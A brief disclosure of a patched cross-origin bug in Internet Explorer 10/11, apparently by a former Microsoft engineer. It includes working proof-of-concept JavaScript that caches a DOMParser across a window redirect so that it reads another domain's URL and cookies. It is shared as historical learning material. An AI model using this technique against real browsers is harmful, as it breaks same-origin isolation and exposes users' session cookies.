By saving a reference to a DOMParser instance created in a new window before it redirects, and then calling parseFromString on that cached instance after the redirect, the resulting document ends up associated with the redirected domain’s origin — giving access to its cookies and URL.

var dp, doc;

function main() {
    var win = window.open("redirect.aspx", "", "width=400,height=400");
    win.setTimeout('alert("Please, don\'t close this alert.");');

    dp = win.eval('new DOMParser()');

    setTimeout('doc = dp.parseFromString("<h></h>", "text/xml"); alert("document.URL: " + doc.URL + "\\n\\ndocument.cookie: " + doc.cookie)', 4000);
}

The user-facing alert in the new window provides the timing delay needed for the redirect to complete. Once Bing (or whichever target) has loaded, the cached dp instance creates a document whose URL and cookie properties reflect the redirected origin. Tested on IE10 / IE11 build 20130227-2100.

Found during my years at Microsoft (2006–2014). These bugs were patched long ago — shared here as a historical record for learning purposes.